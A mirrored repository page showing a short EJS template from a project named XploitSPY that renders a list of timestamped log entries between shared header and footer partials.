mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 18:09:22 +08:00
23 lines
605 B
Plaintext
23 lines
605 B
Plaintext
|
<!DOCTYPE html>
|
||
|
<html>
|
||
|
|
||
|
<% include partials/head.ejs %>
|
||
|
|
||
|
|
||
|
<body>
|
||
|
<div class="ui container">
|
||
|
<% include partials/header.ejs %>
|
||
|
<div class="ui segment">
|
||
|
<div class="logs">
|
||
|
<% logs.forEach((log) => { %>
|
||
|
<div class="logitm <%= log.type %>">
|
||
|
<%= new Date(log.time).toLocaleString('en-GB', { timeZone: 'UTC' }) %> =>
|
||
|
<%= log.type %> | <%= log.message %> </div>
|
||
|
<% }) %>
|
||
|
</div>
|
||
|
</div>
|
||
|
</div>
|
||
|
<% include partials/footer.ejs %>
|
||
|
</body>
|
||
|
|
||
|
</html>
|